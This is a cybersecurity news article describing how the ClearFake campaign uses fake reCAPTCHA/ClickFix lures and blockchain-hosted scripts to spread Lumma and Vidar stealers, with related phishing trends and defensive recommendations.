ClearFake Expands Malware Tactics with Fake reCAPTCHA and Web3 Integration

Cybercriminals Leverage Sophisticated Techniques to Distribute Lumma and Vidar Stealers

The ClearFake malware campaign has evolved, now utilizing fake reCAPTCHA and Cloudflare Turnstile prompts to deceive users into downloading Lumma Stealer and Vidar Stealer.

A Growing Threat: Web3 Capabilities and ClickFix Lures

First discovered in July 2023, ClearFake spreads malware through fake browser update alerts on compromised WordPress sites. The campaign has since integrated advanced evasion techniques, including:
???? EtherHiding – Hiding payload retrieval within Binance Smart Chain (BSC) contracts.
???? ClickFix Social Engineering – Tricking users into running malicious PowerShell scripts under the guise of fixing a technical issue.
???? Web3 Integration – Using smart contract APIs to fingerprint victims, retrieve malicious JavaScript, and encrypt attack components.

Multi-Stage Infection Process

When a user visits a compromised website, their browser loads an intermediate JavaScript script from BSC, which:
1️⃣ Analyzes the system for fingerprinting.
2️⃣ Fetches an encrypted ClickFix payload from Cloudflare Pages.
3️⃣ Deploys malware if the user follows through with the deceptive PowerShell prompt.

Malware Deployment and Growing Reach

ClearFake has been linked to Lumma Stealer, a powerful information-stealing malware that targets Windows and macOS. In January 2025, another variation of the campaign deployed Vidar Stealer through a PowerShell loader.

According to Sekoia, over 9,300 websites have been compromised, with an estimated 200,000 users exposed to ClearFake’s malware lures in July 2024 alone.

Expanding Impact: Supply Chain Attacks and Phishing

Recent incidents highlight ClearFake’s growing impact:
Auto Dealership Breach – Attackers infiltrated 100+ auto dealership websites through a compromised third-party video service (LES Automotive), executing ClickFix lures that deployed SectopRAT malware.

Phishing Campaigns – Threat actors have also been observed using:

• Virtual Hard Disk (VHD) attachments to spread Venom RAT.
• Excel file exploits (CVE-2017-0199) to deploy AsyncRAT and Remcos RAT.
• Microsoft 365 misconfigurations to hijack tenant accounts for phishing and credential theft.

The Rise of Browser-in-the-Middle (BitM) Attacks

Cybersecurity firm Mandiant warns that BitM frameworks are making it easier for attackers to hijack accounts by serving legitimate sites through attacker-controlled browsers. This technique can bypass multi-factor authentication (MFA) and deceive users into unwittingly surrendering session credentials.

Protecting Against ClearFake and Similar Threats

To mitigate risks, organizations should:
✅ Strengthen authentication mechanisms to counteract Adversary-in-the-Middle (AitM) and BitM techniques.
✅ Restrict PowerShell execution to trusted administrators.
✅ Monitor network traffic for anomalous BSC interactions and malware activity.
✅ Update security policies to detect evolving social engineering tactics.

As ClearFake continues to evolve, its increasing reliance on Web3 technology and stealthy infection methods makes it a significant threat to businesses and users worldwide.